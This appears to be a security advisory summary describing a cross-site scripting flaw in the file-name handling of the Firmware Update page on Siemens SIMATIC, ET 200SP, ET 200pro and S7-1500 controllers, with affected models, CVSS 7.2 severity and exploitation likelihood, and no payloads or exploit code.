The flaw stems from a failure to validate and sanitize file names on the Firmware Update page of Siemens industrial controllers. A remote attacker can socially engineer an operator into selecting a crafted firmware file. When the user selects the modified firmware file to be uploaded, embedded JavaScript can be executed in the context of the authenticated session, enabling the attacker to hijack the session or steal credentials. This is a classic cross‑site scripting (CWE‑79) vulnerability that can compromise confidentiality and integrity of user sessions.

All Siemens SIMATIC Drive Controller CPUs listed (e.g., 1504D TF, 1507D TF), the entire ET 200SP CPU family (1510SP, 1511SP, 1512SP, 1514SP, 1515SP, 1516SP, 1517SP, 1518SP, 1514SPT variants), the S7‑1500 CPU series (various models such as 1511‑1, 1512C‑1, 1513‑1, 1515‑2, 1516‑3, 1517‑3, 1518‑4 and related variants), every ET 200pro CPU (1513PRO, 1516PRO), many S7‑1500 software controller models (including Linux and V2/V3 releases), and all SIPLUS and other variant models referenced. No specific version ranges are specified, so every device of the listed families is considered vulnerable until a corrective update is applied.

The CVSS score of 7.2 reflects a high severity impact if exploited. The EPSS score is not available and the vulnerability is not in the CISA KEV catalog, indicating no widely known public exploits at this time. The likely attack vector is remote via the web interface; the attacker must persuade or trick an authenticated user to upload the malicious firmware. Therefore, the probability of successful exploitation is moderate due to required user interaction, but the consequence is severe because the attack runs with the victim’s session privileges.